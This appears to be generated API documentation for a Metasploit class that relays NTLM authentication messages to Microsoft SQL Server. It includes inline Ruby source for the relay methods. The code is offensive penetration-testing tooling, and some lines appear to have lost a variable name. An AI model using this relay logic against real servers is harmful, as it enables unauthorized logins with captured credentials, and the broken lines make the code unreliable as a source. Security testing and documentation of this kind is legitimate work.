Class: Msf::Exploit::Remote::Relay::NTLM::Target::MSSQL::Client
- Inherits:
-
Rex::Proto::MSSQL::Client
- Object
- Rex::Proto::MSSQL::Client
- Msf::Exploit::Remote::Relay::NTLM::Target::MSSQL::Client
- Defined in:
- lib/msf/core/exploit/remote/relay/ntlm/target/mssql/client.rb
Instance Attribute Summary collapse
-
#logger ⇒ Object
readonly
protected
Returns the value of attribute logger.
-
#target ⇒ Object
readonly
Returns the value of attribute target.
Class Method Summary collapse
Instance Method Summary collapse
-
#initialize(framework_module, proxies = nil, provider: nil, target: nil, logger: nil, timeout: 30) ⇒ Client
constructor
A new instance of Client.
- #relay_ntlmssp_type1(client_type1_msg) ⇒ Object
- #relay_ntlmssp_type3(client_type3_msg) ⇒ Object
Constructor Details
#initialize(framework_module, proxies = nil, provider: nil, target: nil, logger: nil, timeout: 30) ⇒ Client
Returns a new instance of Client.
5 6 7 8 9 10 11 |
# File 'lib/msf/core/exploit/remote/relay/ntlm/target/mssql/client.rb', line 5 def initialize(framework_module, proxies = nil, provider: nil, target: nil, logger: nil, timeout: 30) @logger = logger @provider = provider @target = target @timeout = timeout super(framework_module, framework_module.framework, target.ip, target.port, proxies) end |
Instance Attribute Details
#logger ⇒ Object (readonly, protected)
Returns the value of attribute logger.
81 82 83 |
# File 'lib/msf/core/exploit/remote/relay/ntlm/target/mssql/client.rb', line 81 def logger @logger end |
#target ⇒ Object (readonly)
Returns the value of attribute target.
3 4 5 |
# File 'lib/msf/core/exploit/remote/relay/ntlm/target/mssql/client.rb', line 3 def target @target end |
Class Method Details
.create(provider, target, logger, timeout, framework_module:) ⇒ Object
13 14 15 16 17 18 19 20 21 |
# File 'lib/msf/core/exploit/remote/relay/ntlm/target/mssql/client.rb', line 13 def self.create(provider, target, logger, timeout, framework_module:) new( framework_module, provider: provider, target: target, logger: logger, timeout: timeout ) end |
Instance Method Details
#relay_ntlmssp_type1(client_type1_msg) ⇒ Object
26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 |
# File 'lib/msf/core/exploit/remote/relay/ntlm/target/mssql/client.rb', line 26 def relay_ntlmssp_type1(client_type1_msg) self.initial_connection_info[:prelogin_data] = mssql_prelogin pkt_hdr = MsTdsHeader.new( packet_type: MsTdsType::TDS7_LOGIN, packet_id: 1 ) pkt_body = MsTdsLogin7.new( option_flags_2: { f_int_security: 1 }, server_name: @target.ip ) pkt_body.sspi = client_type1_msg.bytes pkt_hdr.packet_length += pkt_body.num_bytes pkt = pkt_hdr.to_binary_s + pkt_body.to_binary_s @mstds_channel.starttls if tdsencryption resp = mssql_send_recv(pkt, @timeout, false) = resp[3..-1] Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult.new( message: Net::NTLM::Message.parse(), nt_status: WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED ) end |
#relay_ntlmssp_type3(client_type3_msg) ⇒ Object
59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 |
# File 'lib/msf/core/exploit/remote/relay/ntlm/target/mssql/client.rb', line 59 def relay_ntlmssp_type3(client_type3_msg) pkt_hdr = MsTdsHeader.new( type: MsTdsType::SSPI_MESSAGE, packet_id: 1 ) pkt_hdr.packet_length += client_type3_msg.length pkt = pkt_hdr.to_binary_s + client_type3_msg resp = mssql_send_recv(pkt) info = mssql_parse_reply(resp) if info[:login_ack] nt_status = WindowsError::NTStatus::STATUS_SUCCESS else nt_status = WindowsError::NTStatus::STATUS_LOGON_FAILURE end Msf::Exploit::Remote::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status) end |